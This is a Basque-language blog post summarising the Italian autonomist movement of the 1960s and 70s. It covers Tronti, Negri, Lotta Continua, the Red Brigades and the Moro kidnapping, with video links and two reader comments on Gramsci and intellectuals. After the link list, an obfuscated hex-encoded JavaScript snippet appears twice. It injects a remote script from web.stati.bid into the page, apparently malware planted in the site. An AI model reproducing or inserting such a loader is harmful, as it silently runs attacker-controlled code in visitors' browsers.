Italiako mugimendu autonomoa 60 eta 70. hamarkadetan (I). Apunte historiko (oso) labur batzuk eta hainbat gomendio.

 “No una cultura obrera, no una figura obrera del intelectual, sino ninguna cultura y ningún intelectual al margen de las necesidades del capital. Es la solución justamente opuesta a la del otro problema: no reproducción obrera de la revolución burguesa, sino ninguna revolución jamas al margen de la existencia de la clase obrera, de lo que ella misma es, de lo que, por lo tanto, está obligada a hacer. Crítica de la cultura quiere decir rechazo ha hacerse intelectuales”

Mario Tronti. Obreros y capital. 1966.

Italiako mugimendu autonomoa langile mugimenduaren autonomia politikoaren teorizazioak eratu zuela esan genezake, lanaren banaketa fordistaren (kate lanaren) amaierak eragina eta mugimendu komunista ofizialaren disidentziatik (desadostasunetik) eratorria. 1940 eta 50eko hamarkadetan “ukaezinak” ziren hainbat aurreiritzi apurtu zituen mugimendu autonomoak, Alderdi Komunistaren (PCI)  hegemonia ideologikoa haustearekin batera. Hegemonia teoriko- ideologikoa, ez soziala.

 

Fabrikan bere erdigunea zuen gizarte antolaketa ereduaren gainbehera ikusten lehena Mario Tronti alderdi komunistako kidea izan zela esan genezake, Obreros y Capital liburuaren publikazioaren bitartez, 1960ko hamarkadan argitaratu zena. Bertan, lanaren indeferentziazioan oinarritzen den aberastasun ereduaren krisia azpimarratzen zen, harreman eredu honen gaindipenerako baldintzen errepasoarekin batera. Jarraitzaile ugari izan zituen idazle Italiarrak, komunismo ofizialarekiko disidentzia hainbat egunkari (publikazioen) bitartez eratu zelarik. Rossana Rossanda, Franco Piperno, Sergio Bologna, Adriano Sofri, Raniero Panzieri edota ezker pentsamenduan mundu mailan ezaguna den Toni Negri  langile klasearen autonomia politikoko pentsalari eta militanteak izan ziren.

Esparru politikoan, parlamentuz kanpo (kale mailan, lantegi eta kaleetan) aktibitatea zuten hainbat talde eratu ziren, hala nola Lotta Continua edota Potere Operaio (Langile Boterea) influentzia handia izatera iritsi ziren. 70. hamarkadan Brigada Gorriak (Brigate Rosse) talde armatuaren aktibitateak ere hasiera izan zuen,  eta langileriaren autonomia politikoa ebatsi zuten beste hainbat kide Alderdi Komunistara itzuli ziren, inoiz berau utzi ez zuenik bazegoen ere.

Ikaragarrizko aktibitate politikoa eta kultura militante berritua eratu zen Italian, mendebaldar munduan existitzen zen alderdi komunista boteretsuenetik eratorria. Praktika autonomoari dagokionean, kolektibitate esperientziak, ekoizpen eremu kapitalistetan sabotajeak, greba deialdiak, genero berreraikuntza esperientziak, etxebizitza hutsen okupazioak eta beste hainbeste esperientzia bizitu ziren. Langile autonomiak 70. hamarkada hasieratik “desideranti” mugimenduaren sorrera ezagutu zuen, langileriaren kondizio soziala gainditzen zuten hainbat esperientzien bitartez praktikara eman zena. Komunismoan bizitzearen ulermena hedatu zen mugimendu autonomoaren baitan, erabilera balioaren mugimendu bezala ere ezagutu zena. Langile mugimenduaren pentsamolde zaharraren gaindipena suposatu zuen batzuentzako, kapitalismo garatuaren subjektibitateak ere aztertu zirelarik.

Italiako mugimendu autonomoak tentsio biziko uneak ezagutu zituen 1977an, eta 1978an Brigada Gorriak alderdi kristauko (DC, Democrazia Cristiana) burua zen Aldo Moro bahitu eta erail ostean errepresio basatiko urteak ezagutu ziren. Mugimendu autonomoaren milaka militante kartzelaratu eta hamarnaka akabatu zituen estatu Italiarrak, esperientzia kolektibo “berezi” honi amaiera emanez.

Italiako autonomiaren esperientzia ezagutzera gonbidatzen zaituztet, horretarako “Otra Vuelta de Tuerka” internet bidezko saioaren bi elkarrizketa interesgarri partekatzen ditudalarik. Langileriaren auto- ezagutza eta elkartasun kolektiboaren krisialdi testuinguru honetan politika iraultzailea birpentsatzea dagokigu, zaharkitua den ekoizpen eredua gainjartzeko arma politikoak eratu beharrean baikaude. Toni Negri eta Mario Tronti garaituak izan ziren, euren pentsamenduaren onena errekuperatzea dagokigularik generazio militante berriei. Dena den, oso interesgarriak diren bi autoreek egun jarraitzen duten perspektiba post-operaistari kritika burutzea ezinbestekoa zaigu nire ustean, horretarako Henrique Amorim Portugaldarrak Toni Negriren lan ez- materialaren ulerkeraren gainean eginiko iruzkina ere partekatzen dut.

Azkenik, Otra Vuelta de Tuerka saioko elkarrizketagilea den Pablo Iglesiasi buruturiko kritika bat ere partekatzen dut, lagunez nahastu ez gaitezen.

 

1.- Otra Vuelta de Tuerka, Toni Negri:  https://www.youtube.com/watch?v=BOpTvdOXF9U

2.- Otra Vuelta de Tuerka, Mario Tronti: https://www.youtube.com/watch?v=xzKymyIsj50

3.- Henrique Amorim, Clases Sociales y trabajo inmaterial:

http://www.herramienta.com.ar/herramienta-web-8/clases-sociales-y-trabajo-inmaterial

4.- Pablo Iglesias “sozialdemokratari” kritika; Marx, la democracia burguesa o la revolución:

Marx, la democracia burguesa o la revolución

  var _0x29b4=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64”];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el) var _0x29b4=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64”];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)

2 Iritzi

  1. Encías Sangrantes

    2018-02-15 at 10:03

    Aupa Deivid!

    Trontin zitie eta Italia aipatzezunez, testu motx bat proposatzet:

    http://www.herramienta.com.ar/teoria-critica-y-marxismo-occidental/lo-intelectual-y-los-intelectuales-acerca-del-concepto-de-intel

    Akaso ezta kriston testue, baño modu baten intelektualan papelan inguruko galdera garrantzitsuenak planteatzeitula ustet. Ustet Gramscik interpretaziyo interesgarriye uzteigula, eta posible da italiko mugimenduen ematean bereizketa indartsue, intelktual organikuen kontzepziyuen barneratzien oinarritzeala.

    Besteik pe,

    • DavidRiazanov

      2018-02-16 at 11:50

      Eskerrik asko erantzuneatiken Marvin. Gramsci eta intelektual organikuen figurie aztertzekue dan esperientzia historiko zein marko teoriko bat dala esango nuke. Sardiniako militante famatuek alderdi komunistien sorrerakin batea garraiatzeun kezka da intelektuala eta herri xumien pentsamendu sozialana, lehenenguek bigarrena baldintzatzeko zeuzkan aukerak aztertzen baitzitun. Hortako Italiako modernitateko pentsamendu eta ekintza politiko nagusiyek (filosofia politikue) aztertu zitun, Maquiavelotik hasi eta Garibaldin unifikaziyo esperientzira arte, Croce pentsalari Hegelarretik pasauta. Bestetik, langile mugimenduen kondiziyo sozial autonomoetatik abiatuta bere zientzia propiyuen espantsiyuen ere aktuatze zun, Turineko langile kulturako ikerketa zentroko sortzailie izan zan beste kontu askoren artien.

      Dena den, intelektualai langile mugimenduekin “kanpo atxikimendu” bat aitortzeiola esango nuke, nolabaiteko gertutasun sentimendu bat, eta ez intelektualan funtziyo sozialan alterazio bat (kasu batzutan bai, bere kasuen adbidez, ez beste batzutan), kasu hortan intelektuala izatiei utziko liokelako teoriko militantie izatea pasauta. Dena den, Gramscin intelektualitatien definiziyuen baitan kasu askotan teoriko eta intelektualan figurak sinbiosiyen daude, intelektualitatie norbanako orok garatzeun pentsamendu formatzat hartze badeu. Pentsamendu sozial dominantie (kuasi unifikaue, homogeneue dana gizarte guztiyentzat, klase bereizketak gaindituta) alterau ahal izateko “teoriko militantien” figuriek hartzeu garrantziye, teoriko eskrupulosue dana eta bere ikerketa lana zailtasun praktikuek gainditzeko erabiltzen duena. Hau litzateke Marx eta Engelsen aktibitatie, baita tradizio militante luze batena ere.

      Intelektual baten hitzetan (Adorno): “El punto en que convergen lo específicamente materialista y lo crítico es la praxis que transforma la sociedad. Suprimir el sufrimiento (…) El telos de esta nueva organización sería la negación del sufrimiento físico hasta el último de sus miembros.”

      Besteik gabe, intelektualan eta teoriko militantien arteko antinomia sintetizatzen duen eztabaida oso interesgarriye eman berri da Borroka Garaida Da! blogien, hemen partekatzen irakurri nahi badezute (azpiko komentayue eman garrantziye): https://borrokagaraia.wordpress.com/2018/01/01/el-espectro-de-la-melancolia/

Iritziak itxita daude.

© 2018 Kontu Lepo